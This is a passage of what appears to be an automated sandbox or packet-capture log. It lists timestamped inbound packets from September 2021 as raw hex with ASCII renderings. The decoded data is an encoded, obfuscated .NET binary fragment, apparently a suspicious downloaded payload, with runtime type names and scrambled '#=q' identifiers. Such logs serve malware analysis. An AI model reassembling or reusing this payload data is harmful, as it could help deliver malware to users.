3-1---A8-3E-----42A--133--6--1A------56----11-3-4-5-7-E-4282C-1---6152D-926-2-66FA1-1---62A-A2BF5----133--6--1B------57----11-3-4-5-E-4-E-5282C-1---6192D-926-2-66FA1-1---62A-A2BF5--133--6--37------17----1114172D1-267E39-----4-26F72-----A2C242B-3-A2BEE7E39
2021-09-14 19:24:32 UTC	55	IN	Data Raw: 2d 2d 2d 2d 36 32 38 46 36 2d 2d 2d 2d 2d 36 32 38 46 2d 2d 2d 2d 2d 2d 36 32 38 45 46 2d 2d 2d 2d 2d 36 36 31 32 38 45 45 2d 2d 2d 2d 2d 36 32 41 2d 2d 2d 2d 2d 33 33 2d 2d 41 2d 2d 32 33 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 32 31 38 31 38 32 44 31 38 32 36 2d 33 31 35 31 45 32 44 31 35 32 36 32 2d 34 41 44 38 44 39 35 33 36 36 36 36 36 35 36 35 36 36 36 36 36 35 36 36 36 35 35 39 36 31 32 41 32 36 32 42 45 36 32 36 32 42 45 39 2d 2d 2d 33 33 2d 2d 41 2d 2d 33 32 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 32 31 43 31 37 32 44 32 37 32 36 32 2d 38 44 46 43 42 33 34 45 36 36 36 35 36 36 36 35 36 36 36 36 36 35 36 35 36 36 35 39 2d 33 31 37 31 43 32 44 31 35 32 36 32 2d 45 46 44 37 46 35 43 31 36 36 36 36 36 35 36 35 36 36 36 36 36 35 36 36 36 35 Data Ascii: ----628F6-----628F------628EF-----66128EE-----62A-----33--A--23---------------218182D1826-3151E2D15262-4AD8D95366666565666665666559612A262BE6262BE9---33--A--32---------------21C172D27262-8DFCB34E66656665666665656659-3171C2D15262-EFD7F5C1666665656666656665
2021-09-14 19:24:32 UTC	62	IN	Data Raw: 32 37 42 36 33 2d 2d 2d 2d 2d 34 2d 36 2d 33 2d 36 35 39 36 46 35 43 2d 31 2d 2d 2d 41 2d 42 2d 37 32 44 2d 36 2d 32 32 38 2d 34 2d 31 2d 2d 2d 36 2d 36 2d 37 35 38 2d 41 2d 36 2d 33 33 32 44 39 32 41 2d 2d 31 33 33 2d 2d 33 2d 2d 33 35 2d 2d 2d 2d 2d 2d 36 46 2d 2d 2d 2d 31 31 2d 32 37 42 36 32 2d 2d 2d 2d 2d 34 31 41 32 44 2d 44 32 36 2d 32 31 34 31 36 32 43 2d 41 32 36 32 36 2d 36 32 43 31 32 32 42 2d 41 2d 41 32 42 46 31 37 44 36 32 2d 2d 2d 2d 2d 34 32 42 46 31 2d 36 36 46 37 39 2d 2d 2d 2d 2d 41 2d 32 31 34 31 44 32 44 2d 33 32 36 32 36 32 41 37 44 36 33 2d 2d 2d 2d 2d 34 32 42 46 38 2d 2d 2d 2d 2d 2d 31 33 33 2d 2d 36 2d 2d 36 35 2d 2d 2d 2d 2d 2d 37 2d 2d 2d 2d 2d 31 31 2d 33 31 36 32 46 2d 36 37 33 35 44 2d 31 2d 2d 2d 41 37 41 2d 33 38 44 32 32 Data Ascii: 27B63-----4-6-3-6596F5C-1---A-B-72D-6-228-4-1---6-6-758-A-6-332D92A--133--3--35------6F----11-27B62-----41A2D-D26-214162C-A2626-62C122B-A-A2BF17D62-----42BF1-66F79-----A-2141D2D-326262A7D63-----42BF8------133--6--65------7-----11-3162F-6735D-1---A7A-38D22
2021-09-14 19:24:32 UTC	69	IN	Data Raw: 46 36 44 2d 31 2d 2d 2d 41 37 45 37 36 2d 2d 2d 2d 2d 34 44 2d 42 44 2d 2d 2d 2d 2d 31 32 38 34 36 2d 2d 2d 2d 2d 41 31 46 2d 44 36 46 36 44 2d 31 2d 2d 2d 41 37 45 37 36 2d 2d 2d 2d 2d 34 44 2d 42 45 2d 2d 2d 2d 2d 31 32 38 34 36 2d 2d 2d 2d 2d 41 31 46 2d 45 36 46 36 44 2d 31 2d 2d 2d 41 37 45 37 36 2d 2d 2d 2d 2d 34 44 2d 42 43 2d 2d 2d 2d 2d 31 32 38 34 36 2d 2d 2d 2d 2d 41 31 46 2d 46 36 46 36 44 2d 31 2d 2d 2d 41 37 45 37 36 2d 2d 2d 2d 2d 34 44 2d 33 32 2d 2d 2d 2d 2d 31 32 38 34 36 2d 2d 2d 2d 2d 41 31 46 31 2d 36 46 36 44 2d 31 2d 2d 2d 41 37 45 37 36 2d 2d 2d 2d 2d 34 44 2d 31 46 2d 2d 2d 2d 31 42 32 38 34 36 2d 2d 2d 2d 2d 41 31 46 31 31 36 46 36 44 2d 31 2d 2d 2d 41 37 45 37 36 2d 2d 2d 2d 2d 34 44 2d 34 38 2d 2d 2d 2d 2d 31 32 38 34 36 2d 2d Data Ascii: F6D-1---A7E76-----4D-BD-----12846-----A1F-D6F6D-1---A7E76-----4D-BE-----12846-----A1F-E6F6D-1---A7E76-----4D-BC-----12846-----A1F-F6F6D-1---A7E76-----4D-32-----12846-----A1F1-6F6D-1---A7E76-----4D-1F----1B2846-----A1F116F6D-1---A7E76-----4D-48-----12846--
2021-09-14 19:24:32 UTC	76	IN	Data Raw: 33 2d 37 2d 33 37 42 31 35 2d 2d 2d 2d 2d 34 31 31 2d 37 32 2d 39 39 32 43 44 2d 31 45 32 38 46 46 2d 2d 2d 2d 2d 36 32 38 42 33 2d 2d 2d 2d 2d 36 32 38 36 31 2d 2d 2d 2d 2d 41 44 45 2d 2d 32 41 36 46 39 37 34 31 31 43 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 33 42 2d 32 2d 2d 2d 2d 33 42 2d 32 2d 2d 2d 2d 32 36 2d 2d 2d 2d 2d 2d 34 36 2d 2d 2d 2d 2d 31 31 33 33 2d 2d 34 2d 2d 35 33 2d 2d 2d 2d 2d 2d 38 2d 2d 2d 2d 2d 31 31 31 36 37 45 33 41 2d 2d 2d 2d 2d 34 36 46 41 44 2d 31 2d 2d 2d 41 31 37 35 39 31 39 32 44 2d 37 32 36 31 41 32 44 2d 36 32 36 32 42 33 36 2d 43 32 42 46 37 2d 42 32 42 46 38 37 45 33 41 2d 2d 2d 2d 2d 34 2d 37 36 46 41 45 2d 31 2d 2d 2d 41 37 42 31 31 2d 2d 2d 2d 2d 34 2d 32 32 38 36 2d 2d 31 2d 2d 2d 41 32 43 2d 43 Data Ascii: 3-7-37B15-----411-72-992CD-1E28FF-----628B3-----62861-----ADE--2A6F97411C--------------------3B-2----3B-2----26------46-----1133--4--53------8-----11167E3A-----46FAD-1---A1759192D-7261A2D-6262B36-C2BF7-B2BF87E3A-----4-76FAE-1---A7B11-----4-2286--1---A2C-C
2021-09-14 19:24:32 UTC	84	IN	Data Raw: 34 33 46 2d 2d 2d 2d 2d 32 31 43 32 44 2d 33 32 36 32 36 32 41 37 44 39 35 2d 2d 2d 2d 2d 34 32 42 46 38 2d 2d 2d 33 33 2d 2d 39 2d 2d 31 46 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 32 2d 32 37 42 39 35 2d 2d 2d 2d 2d 34 2d 33 32 38 38 36 2d 2d 2d 2d 2d 41 37 34 33 46 2d 2d 2d 2d 2d 32 31 41 32 44 2d 33 32 36 32 36 32 41 37 44 39 35 2d 2d 2d 2d 2d 34 32 42 46 38 2d 2d 2d 33 33 2d 2d 39 2d 2d 31 46 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 32 2d 32 37 42 39 36 2d 2d 2d 2d 2d 34 2d 33 32 38 38 35 2d 2d 2d 2d 2d 41 37 34 33 43 2d 2d 2d 2d 2d 32 31 43 32 44 2d 33 32 36 32 36 32 41 37 44 39 36 2d 2d 2d 2d 2d 34 32 42 46 38 2d 2d 2d 33 33 2d 2d 39 2d 2d 31 46 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 32 2d 32 37 42 39 36 2d 2d 2d 2d 2d 34 2d 33 32 38 Data Ascii: 43F-----21C2D-326262A7D95-----42BF8---33--9--1F---------------2-27B95-----4-32886-----A743F-----21A2D-326262A7D95-----42BF8---33--9--1F---------------2-27B96-----4-32885-----A743C-----21C2D-326262A7D96-----42BF8---33--9--1F---------------2-27B96-----4-328
2021-09-14 19:24:32 UTC	91	IN	Data Raw: 45 2d 31 2d 2d 2d 41 2d 32 2d 32 37 42 42 31 2d 2d 2d 2d 2d 34 2d 36 35 38 31 39 32 44 31 37 32 36 32 36 2d 32 37 42 42 31 2d 2d 2d 2d 2d 34 2d 32 37 42 42 34 2d 2d 2d 2d 2d 34 38 45 42 37 33 33 35 41 32 42 2d 41 2d 41 32 42 43 39 37 44 42 31 2d 2d 2d 2d 2d 34 32 42 45 34 2d 32 37 42 39 37 2d 2d 2d 2d 2d 34 31 37 32 44 2d 36 32 36 2d 39 32 43 31 32 32 42 2d 33 2d 44 32 42 46 38 2d 39 2d 32 2d 32 37 42 42 34 2d 2d 2d 2d 2d 34 36 46 41 44 2d 31 2d 2d 2d 36 2d 32 31 36 31 41 32 44 31 45 32 36 32 36 2d 32 37 43 42 34 2d 2d 2d 2d 2d 34 31 36 32 38 2d 36 2d 2d 2d 2d 32 42 2d 32 37 42 42 31 2d 2d 2d 2d 2d 34 2d 32 37 42 41 2d 2d 2d 2d 2d 2d 34 33 32 2d 45 32 42 2d 37 37 44 42 38 2d 2d 2d 2d 2d 34 32 42 44 44 32 38 45 37 2d 31 2d 2d 2d 41 2d 36 2d 35 2d 34 35 39 Data Ascii: E-1---A-2-27BB1-----4-658192D172626-27BB1-----4-27BB4-----48EB7335A2B-A-A2BC97DB1-----42BE4-27B97-----4172D-626-92C122B-3-D2BF8-9-2-27BB4-----46FAD-1---6-2161A2D1E2626-27CB4-----41628-6----2B-27BB1-----4-27BA------432-E2B-77DB8-----42BDD28E7-1---A-6-5-459
2021-09-14 19:24:32 UTC	98	IN	Data Raw: 42 35 34 42 43 43 41 43 35 31 33 37 41 44 42 44 45 38 37 44 44 35 42 36 31 39 37 36 34 38 41 43 34 37 42 34 38 36 35 38 31 34 42 42 46 41 33 32 2d 38 44 31 33 41 41 44 35 43 37 31 45 37 2d 46 41 42 36 46 36 33 32 43 45 33 43 31 38 37 46 45 45 45 43 39 35 34 42 42 46 41 33 45 39 44 45 36 35 2d 35 45 38 34 42 42 46 41 33 37 36 34 37 34 45 38 42 32 43 43 31 42 39 46 35 34 42 42 46 41 33 46 46 44 43 36 34 41 34 43 39 39 37 35 41 43 36 45 39 45 46 42 31 43 44 38 33 33 43 39 46 43 42 36 37 35 42 44 31 38 37 45 37 44 46 34 42 42 46 41 33 43 42 43 43 31 46 39 39 33 45 42 45 36 37 42 39 37 2d 46 43 37 37 39 38 31 2d 32 44 41 31 41 37 31 39 33 44 38 2d 31 37 41 37 39 2d 38 36 34 35 45 36 46 43 32 37 34 42 42 46 41 33 37 42 41 42 35 2d 34 46 44 2d 2d 35 39 42 43 38 Data Ascii: B54BCCAC5137ADBDE87DD5B6197648AC47B4865814BBFA32-8D13AAD5C71E7-FAB6F632CE3C187FEEEC954BBFA3E9DE65-5E84BBFA376474E8B2CC1B9F54BBFA3FFDC64A4C9975AC6E9EFB1CD833C9FCB675BD187E7DF4BBFA3CBCC1F993EBE67B97-FC77981-2DA1A7193D8-17A79-8645E6FC274BBFA37BAB5-4FD--59BC8
2021-09-14 19:24:32 UTC	105	IN	Data Raw: 36 2d 36 2d 2d 31 31 2d 37 34 44 2d 36 2d 36 2d 2d 31 38 2d 37 34 44 2d 36 2d 36 2d 2d 32 35 2d 37 34 44 2d 36 2d 36 2d 2d 33 2d 2d 37 35 39 2d 2d 2d 36 2d 2d 33 35 2d 37 35 39 2d 2d 31 32 2d 2d 34 37 2d 37 34 42 2d 37 31 32 2d 2d 35 36 2d 37 34 42 2d 37 31 32 2d 2d 35 46 2d 37 34 42 2d 37 31 32 2d 2d 36 39 2d 37 34 42 2d 37 31 32 2d 2d 37 34 2d 37 34 42 2d 37 31 32 2d 2d 38 2d 2d 37 38 45 2d 37 31 32 2d 2d 41 31 2d 37 38 45 2d 37 31 32 2d 2d 41 45 2d 37 38 45 2d 37 31 32 2d 2d 42 42 2d 37 38 45 2d 37 31 32 2d 2d 43 32 2d 37 38 45 2d 37 31 32 2d 2d 44 37 2d 37 38 45 2d 37 31 32 2d 2d 45 43 2d 37 38 45 2d 37 31 32 2d 2d 46 38 2d 37 38 45 2d 37 31 32 2d 2d 2d 38 2d 38 38 45 2d 37 2d 36 2d 2d 31 33 2d 38 35 39 2d 2d 2d 36 2d 2d 31 41 2d 38 35 39 2d 2d 2d 36 Data Ascii: 6-6--11-74D-6-6--18-74D-6-6--25-74D-6-6--3--759---6--35-759--12--47-74B-712--56-74B-712--5F-74B-712--69-74B-712--74-74B-712--8--78E-712--A1-78E-712--AE-78E-712--BB-78E-712--C2-78E-712--D7-78E-712--EC-78E-712--F8-78E-712---8-88E-7-6--13-859---6--1A-859---6
2021-09-14 19:24:32 UTC	113	IN	Data Raw: 2d 35 37 32 36 33 32 2d 31 32 35 2d 2d 46 38 32 44 2d 2d 2d 2d 2d 2d 2d 2d 2d 36 2d 2d 41 42 32 36 36 37 2d 2d 32 37 2d 2d 32 43 32 45 2d 2d 2d 2d 2d 2d 2d 2d 2d 36 2d 2d 44 42 32 36 36 37 2d 2d 32 37 2d 2d 36 2d 32 45 2d 2d 2d 2d 2d 2d 2d 2d 2d 36 31 38 46 33 31 41 44 45 2d 2d 32 37 2d 2d 38 34 32 45 2d 2d 2d 2d 2d 2d 2d 2d 36 36 2d 42 34 33 32 37 33 39 2d 31 32 38 2d 2d 39 43 32 45 2d 2d 2d 2d 2d 2d 2d 2d 36 36 2d 33 35 31 32 37 2d 35 2d 31 32 38 2d 2d 44 43 32 45 2d 2d 2d 2d 2d 2d 2d 2d 36 36 2d 33 37 37 32 37 33 44 2d 31 32 39 2d 2d 46 43 32 45 2d 2d 2d 2d 2d 2d 2d 2d 36 36 2d 33 39 45 32 37 36 37 2d 2d 32 41 2d 2d 2d 38 32 46 2d 2d 2d 2d 2d 2d 2d 2d 36 36 2d 33 41 39 32 37 34 32 2d 31 32 41 2d 2d 38 43 32 46 2d 2d 2d 2d 2d 2d 2d 2d 36 36 2d 33 2d 41 Data Ascii: -572632-125--F82D---------6--AB2667--27--2C2E---------6--DB2667--27--6-2E---------618F31ADE--27--842E--------66-B432739-128--9C2E--------66-35127-5-128--DC2E--------66-377273D-129--FC2E--------66-39E2767--2A---82F--------66-3A92742-12A--8C2F--------66-3-A
2021-09-14 19:24:32 UTC	120	IN	Data Raw: 33 2d 2d 2d 2d 2d 2d 2d 2d 31 36 2d 2d 42 31 37 41 33 43 2d 32 33 31 2d 31 36 34 41 33 2d 2d 2d 2d 2d 2d 2d 2d 31 36 2d 2d 46 35 37 41 33 43 2d 32 33 31 2d 31 39 2d 41 33 2d 2d 2d 2d 2d 2d 2d 2d 31 36 2d 2d 33 39 37 42 33 43 2d 32 33 31 2d 31 42 43 41 33 2d 2d 2d 2d 2d 2d 2d 2d 31 36 2d 2d 37 44 37 42 46 39 2d 33 33 31 2d 31 45 38 41 33 2d 2d 2d 2d 2d 2d 2d 2d 31 36 2d 2d 41 44 37 42 46 39 2d 33 33 31 2d 31 31 38 41 34 2d 2d 2d 2d 2d 2d 2d 2d 31 36 2d 2d 44 44 37 42 46 39 2d 33 33 31 2d 31 34 38 41 34 2d 2d 2d 2d 2d 2d 2d 2d 31 36 2d 2d 2d 44 37 43 46 39 2d 33 33 31 2d 31 37 38 41 34 2d 2d 2d 2d 2d 2d 2d 2d 31 36 2d 2d 35 31 37 43 46 39 2d 33 33 31 2d 31 41 38 41 34 2d 2d 2d 2d 2d 2d 2d 2d 31 36 2d 2d 39 35 37 43 46 39 2d 33 33 31 2d 31 44 38 41 34 2d 2d Data Ascii: 3--------16--B17A3C-231-164A3--------16--F57A3C-231-19-A3--------16--397B3C-231-1BCA3--------16--7D7BF9-331-1E8A3--------16--AD7BF9-331-118A4--------16--DD7BF9-331-148A4--------16---D7CF9-331-178A4--------16--517CF9-331-1A8A4--------16--957CF9-331-1D8A4--
2021-09-14 19:24:32 UTC	127	IN	Data Raw: 2d 2d 44 36 46 2d 2d 2d 2d 2d 31 2d 2d 35 39 36 46 2d 2d 2d 2d 2d 31 2d 2d 34 44 37 2d 2d 2d 2d 2d 2d 31 2d 2d 38 35 37 2d 2d 2d 2d 2d 2d 31 2d 2d 41 31 37 2d 2d 2d 2d 2d 2d 32 2d 2d 42 44 37 2d 2d 2d 2d 2d 2d 31 2d 2d 44 39 37 2d 2d 2d 2d 2d 2d 32 2d 2d 2d 39 37 31 2d 2d 2d 2d 2d 31 2d 2d 33 39 37 31 2d 2d 2d 2d 2d 31 2d 2d 38 35 37 31 2d 2d 2d 2d 2d 31 2d 2d 41 31 37 31 2d 2d 2d 2d 2d 32 2d 2d 42 44 37 31 2d 2d 2d 2d 2d 31 2d 2d 46 35 37 31 2d 2d 2d 2d 2d 32 2d 2d 31 31 37 32 2d 2d 2d 2d 2d 31 2d 2d 2d 31 35 38 2d 2d 2d 2d 2d 31 2d 2d 34 39 37 32 2d 2d 2d 2d 2d 31 2d 2d 36 35 37 32 2d 2d 2d 2d 2d 32 2d 2d 38 31 37 32 2d 2d 2d 2d 2d 31 2d 2d 43 39 37 33 2d 2d 2d 2d 2d 31 2d 2d 2d 31 37 34 2d 2d 2d 2d 2d 31 2d 2d 34 44 37 34 2d 2d 2d 2d 2d 31 2d 2d 38 35 Data Ascii: --D6F-----1--596F-----1--4D7------1--857------1--A17------2--BD7------1--D97------2---971-----1--3971-----1--8571-----1--A171-----2--BD71-----1--F571-----2--1172-----1---158-----1--4972-----1--6572-----2--8172-----1--C973-----1---174-----1--4D74-----1--85
2021-09-14 19:24:32 UTC	134	IN	Data Raw: 2d 44 38 41 39 33 41 2d 41 36 43 2d 2d 39 44 41 39 39 43 2d 2d 36 43 2d 2d 39 37 41 41 33 2d 2d 46 31 39 2d 36 46 33 31 41 32 45 31 33 34 39 2d 2d 46 33 31 41 36 37 2d 2d 46 39 2d 35 46 33 31 41 43 43 31 32 37 31 2d 35 46 33 31 41 39 38 2d 31 37 31 2d 35 45 38 31 43 41 36 2d 2d 32 31 2d 35 46 33 31 41 42 41 31 33 41 31 2d 34 46 33 31 41 43 34 31 33 44 39 2d 34 46 35 42 31 44 35 31 33 44 31 2d 34 2d 41 42 32 44 42 31 33 42 39 2d 34 46 33 31 41 46 35 31 33 41 39 2d 34 31 34 42 32 39 43 2d 2d 41 39 2d 34 32 35 42 32 46 43 31 33 44 31 2d 34 46 33 31 41 46 43 31 33 44 39 2d 34 46 33 31 41 2d 33 31 34 43 39 2d 34 31 34 42 32 39 43 2d 2d 43 39 2d 34 32 35 42 32 46 43 31 33 35 39 2d 35 37 46 41 39 35 36 2d 34 37 31 2d 35 46 33 31 41 36 37 2d 2d 37 31 2d 35 33 33 Data Ascii: -D8A93A-A6C--9DA99C--6C--97AA3--F19-6F31A2E1349--F31A67--F9-5F31ACC1271-5F31A98-171-5E81CA6--21-5F31ABA13A1-4F31AC413D9-4F5B1D513D1-4-AB2DB13B9-4F31AF513A9-414B29C--A9-425B2FC13D1-4F31AFC13D9-4F31A-314C9-414B29C--C9-425B2FC1359-57FA956-471-5F31A67--71-533
2021-09-14 19:24:32 UTC	141	IN	Data Raw: 42 34 36 37 32 36 31 36 44 36 35 2d 2d 35 33 37 34 36 31 36 33 36 42 35 34 37 32 36 31 36 33 36 35 2d 2d 34 34 36 46 37 35 36 32 36 43 36 35 2d 2d 35 32 36 35 36 33 37 34 36 31 36 45 36 37 36 43 36 35 2d 2d 35 33 36 39 37 41 36 35 2d 2d 34 35 36 45 37 35 36 44 2d 2d 34 35 36 45 37 36 36 39 37 32 36 46 36 45 36 44 36 35 36 45 37 34 2d 2d 35 33 37 2d 36 35 36 33 36 39 36 31 36 43 34 36 36 46 36 43 36 34 36 35 37 32 2d 2d 34 35 37 36 36 35 36 45 37 34 34 31 37 32 36 37 37 33 2d 2d 34 35 37 36 36 35 36 45 37 34 34 38 36 31 36 45 36 34 36 43 36 35 37 32 2d 2d 34 35 37 36 36 35 36 45 37 34 34 38 36 31 36 45 36 34 36 43 36 35 37 32 36 2d 33 31 2d 2d 34 35 37 38 36 33 36 35 37 2d 37 34 36 39 36 46 36 45 2d 2d 34 37 34 33 2d 2d 34 37 37 35 36 39 36 34 2d 2d 34 39 Data Ascii: B4672616D65--537461636B5472616365--446F75626C65--52656374616E676C65--53697A65--456E756D--456E7669726F6E6D656E74--537-656369616C466F6C646572--4576656E7441726773--4576656E7448616E646C6572--4576656E7448616E646C65726-31--457863657-74696F6E--4743--47756964--49
2021-09-14 19:24:32 UTC	149	IN	Data Raw: 36 34 39 37 37 33 37 34 34 37 33 36 38 36 37 34 45 35 37 34 37 37 36 36 35 34 31 37 36 34 32 35 31 33 44 2d 2d 32 33 33 44 37 31 36 38 34 35 33 32 35 2d 33 32 36 42 33 34 33 36 36 41 36 39 35 33 35 33 36 41 34 46 33 38 33 36 36 37 33 33 36 45 34 32 33 31 34 44 36 42 34 43 34 37 34 33 33 39 35 46 33 33 36 31 37 36 34 34 37 2d 34 39 33 37 36 39 35 39 36 32 35 35 34 38 37 32 33 35 36 37 33 44 2d 2d 32 33 33 44 37 31 37 36 35 38 32 34 34 41 33 32 33 34 37 32 34 39 33 2d 36 35 34 41 33 2d 36 37 35 37 36 36 34 31 33 36 34 33 34 35 36 34 37 41 35 36 34 41 34 45 33 37 36 32 35 31 34 45 35 46 35 39 35 34 37 35 35 33 33 39 33 38 34 45 33 2d 37 39 37 39 34 44 35 39 35 2d 36 46 33 44 2d 2d 32 33 33 44 37 31 33 36 34 45 36 35 36 45 36 36 35 31 36 32 37 41 35 31 35 39 Data Ascii: 6497737447368674E57477665417642513D--233D716845325-326B34366A6953536A4F383667336E42314D6B4C4743395F336176447-493769596255487235673D--233D717658244A323472493-654A3-67576641364345647A564A4E3762514E5F5954755339384E3-79794D595-6F3D--233D71364E656E6651627A5159
2021-09-14 19:24:32 UTC	156	IN	Data Raw: 33 33 37 35 46 37 41 34 43 34 33 34 45 36 34 34 36 34 33 36 39 34 38 37 34 35 2d 34 38 33 31 37 39 35 32 33 39 33 38 37 37 33 37 35 34 36 32 36 44 37 32 35 33 33 34 37 36 35 35 34 35 33 44 2d 2d 34 35 36 45 36 34 34 39 36 45 37 36 36 46 36 42 36 35 2d 2d 32 33 33 44 37 31 33 39 33 35 37 37 33 39 34 44 37 2d 36 31 34 37 33 34 35 41 36 33 36 37 36 42 34 37 36 37 36 45 36 44 35 31 34 39 35 34 34 46 36 34 34 38 37 32 33 35 34 39 36 31 34 43 35 38 34 34 33 38 36 31 34 33 33 36 36 46 33 33 34 35 37 31 37 34 34 35 33 2d 35 2d 35 31 33 44 2d 2d 34 39 36 45 37 36 36 46 36 42 36 35 2d 2d 32 33 33 44 37 31 37 38 37 2d 33 36 36 33 37 34 33 34 34 41 34 37 34 43 36 31 34 44 34 34 36 32 37 37 36 37 33 36 36 36 36 42 37 32 34 39 34 35 37 37 33 44 33 44 2d 2d 32 33 33 44 Data Ascii: 3375F7A4C434E6446436948745-483179523938773754626D7253347655453D--456E64496E766F6B65--233D71393577394D7-6147345A63676B47676E6D5149544F6448723549614C5844386143366F33457174453-5-513D--496E766F6B65--233D71787-366374344A474C614D4462776736666B724945773D3D--233D
2021-09-14 19:24:32 UTC	163	IN	Data Raw: 36 36 37 33 44 33 44 2d 2d 34 35 36 45 37 34 37 32 37 39 34 35 37 38 36 39 37 33 37 34 37 33 2d 2d 34 37 36 35 37 34 34 35 36 45 37 34 37 32 36 39 36 35 37 33 2d 2d 32 33 33 44 37 31 33 32 36 37 37 34 36 38 37 36 34 32 33 36 33 32 36 45 33 2d 33 37 36 36 35 39 35 36 35 34 37 38 33 35 36 36 37 37 34 39 37 31 37 38 34 32 34 31 36 46 33 31 37 34 35 46 36 38 37 33 32 34 36 39 36 43 33 39 34 31 36 33 32 34 33 34 34 36 35 39 35 46 34 37 37 37 33 44 2d 2d 32 33 33 44 37 31 37 32 33 35 37 31 37 2d 37 36 34 46 35 2d 36 45 34 43 37 38 34 43 37 2d 33 36 36 31 34 37 36 42 36 36 34 31 34 44 33 37 37 37 35 31 33 44 33 44 2d 2d 32 33 33 44 37 31 33 36 33 35 37 41 36 45 34 36 36 37 33 2d 35 46 33 32 33 33 33 34 36 45 36 36 36 45 36 38 34 43 33 34 34 39 33 38 37 39 35 32 Data Ascii: 6673D3D--456E747279457869737473--476574456E7472696573--233D7132677468764236326E3-37665956547835667749717842416F31745F687324696C394163243446595F47773D--233D717235717-764F5-6E4C784C7-3661476B66414D3777513D3D--233D7136357A6E46673-5F3233346E666E684C3449387952
2021-09-14 19:24:32 UTC	170	IN	Data Raw: 37 34 44 33 33 36 44 34 46 37 36 36 36 37 34 37 32 37 37 33 44 2d 2d 32 33 33 44 37 31 36 42 36 33 35 36 36 42 34 41 37 33 36 42 37 35 34 37 34 31 33 34 36 46 33 37 36 42 34 37 37 35 34 45 33 37 33 39 36 39 33 31 37 37 33 44 33 44 2d 2d 32 33 33 44 37 31 36 34 33 33 34 39 37 34 36 34 33 31 34 35 34 43 34 34 35 2d 34 38 34 41 37 38 36 38 34 43 37 36 37 34 33 2d 37 39 33 31 34 45 35 31 33 44 33 44 2d 2d 32 33 33 44 37 31 35 38 36 42 36 37 37 2d 36 36 36 37 36 38 37 36 35 34 34 42 34 34 35 41 34 37 36 43 35 38 34 32 34 37 34 39 33 34 37 38 33 39 37 36 36 35 35 31 34 46 33 34 34 41 36 36 36 41 34 36 33 37 34 37 35 37 33 32 34 35 34 33 37 37 33 39 32 34 34 43 33 33 34 35 37 36 37 39 34 42 35 41 34 37 34 46 36 45 37 41 36 39 37 37 35 38 34 35 33 32 35 38 37 32 Data Ascii: 74D336D4F76667472773D--233D716B63566B4A736B754741346F376B47754E37396931773D3D--233D71643349746431454C445-484A78684C76743-79314E513D3D--233D71586B677-66676876544B445A476C584247493478397665514F344A666A463747573245437739244C334576794B5A474F6E7A69775845325872
2021-09-14 19:24:32 UTC	178	IN	Data Raw: 2d 34 32 35 32 34 41 36 34 34 31 37 33 35 39 36 43 35 38 35 33 35 32 35 35 36 33 37 37 36 39 37 41 37 37 33 44 2d 2d 32 33 33 44 37 31 36 46 37 36 36 33 33 2d 34 41 33 37 34 42 33 36 36 32 33 39 34 35 37 31 35 46 34 33 33 2d 34 42 33 34 33 36 37 32 36 32 36 44 36 37 33 44 33 44 2d 2d 32 33 33 44 37 31 37 36 36 32 35 34 34 45 34 32 36 39 36 38 34 37 33 32 37 41 34 31 35 32 37 33 36 35 37 37 36 42 35 32 34 39 34 36 35 34 35 33 35 31 33 44 33 44 2d 2d 32 33 33 44 37 31 33 35 36 41 33 33 37 37 37 36 34 41 35 38 36 43 36 45 37 32 34 37 36 44 35 32 36 45 34 42 35 35 34 38 37 32 35 46 33 31 35 33 35 31 33 44 33 44 2d 2d 32 33 33 44 37 31 34 35 34 39 35 2d 36 33 36 45 36 34 34 46 34 43 37 32 35 36 33 32 34 37 34 41 36 44 36 45 36 46 33 37 37 41 34 42 37 34 34 32 Data Ascii: -42524A644173596C585352556377697A773D--233D716F76633-4A374B36623945715F433-4B343672626D673D3D--233D717662544E42696847327A41527365776B5249465453513D3D--233D71356A3377764A586C6E72476D526E4B5548725F3153513D3D--233D7145495-636E644F4C725632474A6D6E6F377A4B7442
2021-09-14 19:24:32 UTC	185	IN	Data Raw: 37 36 41 35 46 36 37 37 34 33 31 33 32 34 35 35 31 33 44 33 44 2d 2d 32 33 33 44 37 31 36 34 34 39 36 44 35 2d 34 31 35 39 33 31 36 46 33 33 35 39 36 38 36 32 34 43 37 34 37 35 36 42 37 37 34 33 35 31 33 39 33 31 36 33 34 39 35 33 36 31 36 35 34 39 34 35 35 37 35 32 34 42 35 33 35 39 37 32 34 37 35 41 33 33 36 34 35 34 35 36 36 45 36 42 35 39 33 44 2d 2d 32 33 33 44 37 31 35 46 36 42 34 37 37 39 34 35 36 45 33 38 34 42 37 32 36 44 34 32 36 44 37 34 33 35 34 44 33 31 34 45 33 39 36 33 35 35 35 33 36 37 33 44 33 44 2d 2d 32 33 33 44 37 31 32 34 36 45 36 41 36 46 37 2d 35 32 37 32 35 2d 36 32 36 43 37 31 36 35 32 34 37 39 37 32 37 33 32 34 37 32 37 33 37 35 33 35 35 31 33 44 33 44 2d 2d 32 33 33 44 37 31 37 41 36 31 33 37 34 46 33 31 34 31 34 38 37 32 37 32 Data Ascii: 76A5F6774313245513D3D--233D7164496D5-4159316F335968624C74756B77435139316349536165494557524B535972475A336454566E6B593D--233D715F6B4779456E384B726D426D74354D314E39635553673D3D--233D71246E6A6F7-52725-626C7165247972732472737535513D3D--233D717A61374F3141487272
